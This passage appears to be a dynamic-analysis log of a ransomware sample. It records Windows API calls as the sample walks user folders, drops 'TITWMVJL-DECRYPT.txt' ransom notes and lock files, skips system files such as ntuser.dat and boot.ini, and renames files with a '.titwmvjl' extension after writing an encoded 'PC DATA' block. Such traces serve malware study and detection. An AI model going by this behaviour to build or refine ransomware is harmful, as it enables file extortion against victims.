\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.941] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.942] CloseHandle (hObject=0x230) returned 1 [0096.942] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.942] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.942] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0xfe)) [0096.942] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.942] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.943] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.943] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Templates\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.943] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\templates\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.944] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.944] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.944] lstrlenW (lpString="C:\\Users\\Default\\Templates\\") returned 27 [0096.944] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Templates\\*") returned="C:\\Users\\Default\\Templates\\*" [0096.944] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Templates\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.944] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.944] CloseHandle (hObject=0x230) returned 1 [0096.945] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.945] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.945] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.945] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\TITWMVJL-DECRYPT.txt" [0096.945] lstrlenW (lpString=".titwmvjl") returned 9 [0096.945] lstrlenW (lpString="C:\\Users\\Default\\TITWMVJL-DECRYPT.txt") returned 37 [0096.945] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.945] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 46 [0096.945] lstrlenW (lpString="C:\\Users\\Default\\TITWMVJL-DECRYPT.txt") returned 37 [0096.945] lstrlenW (lpString=".txt") returned 4 [0096.945] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.945] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.945] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.945] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.945] lstrlenW (lpString="C:\\Users\\Default\\TITWMVJL-DECRYPT.txt") returned 37 [0096.945] lstrlenW (lpString="C:\\Users\\Default\\TITWMVJL-DECRYPT.txt") returned 37 [0096.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.946] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.946] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.946] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.946] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.946] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.946] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.946] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0096.946] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0096.946] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0096.946] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\" [0096.946] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.946] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.947] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.947] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.947] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.947] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.947] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.947] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.947] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.947] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Videos\\\\TITWMVJL-DECRYPT.txt") returned 45 [0096.947] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\videos\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0096.948] GetLastError () returned 0x50 [0096.948] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.948] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.948] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x10e)) [0096.948] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.948] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.948] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.949] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Videos\\d2ca4a09d2ca4deb61a.lock") returned 48 [0096.949] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\videos\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.949] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.949] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.949] lstrlenW (lpString="C:\\Users\\Default\\Videos\\") returned 24 [0096.949] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Videos\\*") returned="C:\\Users\\Default\\Videos\\*" [0096.949] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Videos\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5033f8 [0096.949] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.950] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.950] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.950] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.950] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.950] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.950] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\Videos\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\Videos\\d2ca4a09d2ca4deb61a.lock" [0096.950] lstrlenW (lpString=".titwmvjl") returned 9 [0096.950] lstrlenW (lpString="C:\\Users\\Default\\Videos\\d2ca4a09d2ca4deb61a.lock") returned 48 [0096.950] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.951] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Videos\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 57 [0096.951] lstrlenW (lpString="C:\\Users\\Default\\Videos\\d2ca4a09d2ca4deb61a.lock") returned 48 [0096.951] lstrlenW (lpString=".lock") returned 5 [0096.951] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.951] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.951] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.951] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.951] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.951] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.951] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.951] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Videos\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\Videos\\TITWMVJL-DECRYPT.txt" [0096.951] lstrlenW (lpString=".titwmvjl") returned 9 [0096.951] lstrlenW (lpString="C:\\Users\\Default\\Videos\\TITWMVJL-DECRYPT.txt") returned 44 [0096.951] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.952] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Videos\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 53 [0096.952] lstrlenW (lpString="C:\\Users\\Default\\Videos\\TITWMVJL-DECRYPT.txt") returned 44 [0096.952] lstrlenW (lpString=".txt") returned 4 [0096.952] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.952] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.952] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.952] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.952] lstrlenW (lpString="C:\\Users\\Default\\Videos\\TITWMVJL-DECRYPT.txt") returned 44 [0096.952] lstrlenW (lpString="C:\\Users\\Default\\Videos\\TITWMVJL-DECRYPT.txt") returned 44 [0096.952] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.952] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.952] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.952] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.952] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.952] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.952] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.952] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.952] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.952] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.953] FindClose (in: hFindFile=0x5033f8 | out: hFindFile=0x5033f8) returned 1 [0096.953] CloseHandle (hObject=0x230) returned 1 [0096.953] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 0 [0096.953] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0096.953] CloseHandle (hObject=0x228) returned 1 [0096.954] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0096.954] lstrcmpW (lpString1="Default User", lpString2=".") returned 1 [0096.954] lstrcmpW (lpString1="Default User", lpString2="..") returned 1 [0096.954] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0096.954] lstrcatW (in: lpString1="C:\\Users\\Default User", lpString2="\\" | out: lpString1="C:\\Users\\Default User\\") returned="C:\\Users\\Default User\\" [0096.954] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.954] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.954] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.955] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.955] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.955] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.955] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.955] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.955] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.955] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default User\\\\TITWMVJL-DECRYPT.txt") returned 43 [0096.955] CreateFileW (lpFileName="C:\\Users\\Default User\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default user\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0096.956] GetLastError () returned 0x50 [0096.956] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.956] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.956] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x10e)) [0096.956] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.956] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.956] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.957] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default User\\d2ca4a09d2ca4deb61a.lock") returned 46 [0096.957] CreateFileW (lpFileName="C:\\Users\\Default User\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default user\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x228 [0096.957] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.957] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.957] lstrlenW (lpString="C:\\Users\\Default User\\") returned 22 [0096.957] lstrcatW (in: lpString1="C:\\Users\\Default User\\", lpString2="*" | out: lpString1="C:\\Users\\Default User\\*") returned="C:\\Users\\Default User\\*" [0096.957] FindFirstFileExW (in: lpFileName="C:\\Users\\Default User\\*", fInfoLevelId=0x1, lpFindFileData=0x259f7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f7b8) returned 0xffffffff [0096.957] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*", lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 0xffffffff [0096.958] CloseHandle (hObject=0x228) returned 1 [0096.958] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0096.958] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0096.958] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0096.958] lstrcatW (in: lpString1="C:\\Users\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\desktop.ini") returned="C:\\Users\\desktop.ini" [0096.958] lstrlenW (lpString=".titwmvjl") returned 9 [0096.958] lstrlenW (lpString="C:\\Users\\desktop.ini") returned 20 [0096.958] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.958] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\desktop.ini.titwmvjl") returned 29 [0096.958] lstrlenW (lpString="C:\\Users\\desktop.ini") returned 20 [0096.958] lstrlenW (lpString=".ini") returned 4 [0096.958] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.958] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0096.958] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0096.958] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.959] lstrlenW (lpString="C:\\Users\\desktop.ini") returned 20 [0096.959] lstrlenW (lpString="C:\\Users\\desktop.ini") returned 20 [0096.959] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0096.959] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.959] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0096.959] lstrcmpW (lpString1="Public", lpString2=".") returned 1 [0096.959] lstrcmpW (lpString1="Public", lpString2="..") returned 1 [0096.959] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0096.959] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0096.959] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.959] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.960] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.960] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.960] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.960] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.960] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.960] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.960] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\\\TITWMVJL-DECRYPT.txt") returned 37 [0096.960] CreateFileW (lpFileName="C:\\Users\\Public\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0096.961] lstrlenW 